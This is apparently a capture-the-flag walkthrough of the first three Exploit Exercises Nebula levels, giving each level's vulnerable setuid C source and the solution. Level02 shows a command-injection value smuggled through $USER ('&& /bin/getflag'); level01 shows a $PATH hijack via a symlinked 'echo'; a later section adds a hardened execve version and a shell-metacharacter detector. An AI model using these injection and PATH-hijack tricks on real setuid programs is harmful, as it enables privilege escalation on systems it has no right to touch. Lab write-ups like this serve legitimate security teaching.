Exploit Exercises Nebula — level02

Source code for this level looks like this:

#define _GNU_SOURCE   /* needed for asprintf(), setresuid() and setresgid() on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    char *buffer;

    gid_t gid;
    uid_t uid;

    /* the binary is setuid flag02, so the effective ids belong to flag02 */
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    buffer = NULL;

    /* $USER is attacker-controlled and is pasted straight into a shell command line */
    asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
    printf("about to call system(\"%s\")\n", buffer);

    system(buffer);
    return 0;
}

I’ll admit that I spent *way* too much time on this because I was focused on a different approach (which, by the way, doesn’t work). This is even easier than the previous one.

You immediately see that part of the command to be executed is supplied by the user via the $USER environment variable. Alas, the programmer doesn’t perform any checks, so we can supply a string like "&& /bin/getflag", which after concatenation becomes "/bin/echo && /bin/getflag is cool".

$ export USER="&& /bin/getflag"

Now you only need to execute /home/flag02/flag02. kthxbai.

Exploit Exercises Nebula — level01

Our job is to find the vulnerability in the application below:

#define _GNU_SOURCE   /* needed for setresuid() and setresgid() on glibc */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* "echo" is not an absolute path, so env resolves it through the inherited $PATH */
    system("/usr/bin/env echo and now what?");
    return 0;
}

You can spot right away that something is wrong with the command supplied to system(). The programmer runs echo through env, so echo is resolved via $PATH (see man env). We can abuse that because the shell uses $PATH to locate the real binaries (e.g. when you type ls you are really executing /bin/ls, which is found through $PATH).

First we need to create a symbolic link named echo pointing to /bin/getflag:

$ ln -s /bin/getflag ~/echo

Then we need to export a new $PATH that points to our home directory:

$ export PATH=/home/level01

After this we can successfully launch /home/flag01/flag01.
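Both level02 and level01 come down to the same root cause: a setuid program hands untrusted input (the $USER value, the inherited $PATH) to a shell via system(). As an added example that is not part of Nebula or of this post, here is how the level02 call could be written without a shell, with a fixed environment that would also have defeated the level01 $PATH trick; run_echo_is_cool and has_shell_metachars are names chosen for this illustration.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hardened counterpart of level02's system() call: the USER value is
 * passed as one argv element of /bin/echo, never spliced into a shell
 * line, so "&& /bin/getflag" is printed literally instead of executed.
 * Returns the child's exit status (0 on success) or -1 on failure. */
int run_echo_is_cool(const char *user)
{
    if (user == NULL)
        user = "(unknown)";
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Child gets a fixed, trusted environment: no inherited $PATH,
         * and the program is addressed by absolute path (cf. level01). */
        char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
        char *const argv[] = { "/bin/echo", (char *)user, "is", "cool", NULL };
        execve("/bin/echo", argv, envp);
        _exit(127); /* only reached if execve itself failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Returns 1 if s contains characters the shell would interpret. Useful as
 * an input check in legacy code that still builds command strings, or as
 * a detection rule over logged "about to call system(...)" lines. */
int has_shell_metachars(const char *s)
{
    return s != NULL && strpbrk(s, "&|;$`\\\"'<>()\n") != NULL;
}

int main(void)
{
    /* constructed sample inputs: the level02 payload and a benign user name */
    const char *payload = "&& /bin/getflag";
    printf("metachars in \"%s\": %d\n", payload, has_shell_metachars(payload));
    printf("metachars in \"level02\": %d\n", has_shell_metachars("level02"));
    return run_echo_is_cool(payload) == 0 ? 0 : 1;
}
```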

Exploit Exercises Nebula — level00

First things first, even if they are trivial.

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

So after logging in I typed the first command that popped into my mind, which was:

$ find / | grep flag00

At the bottom of the output you can spot the odd-looking path /bin/.../flag00; executing it gives you the green light to run /bin/getflag.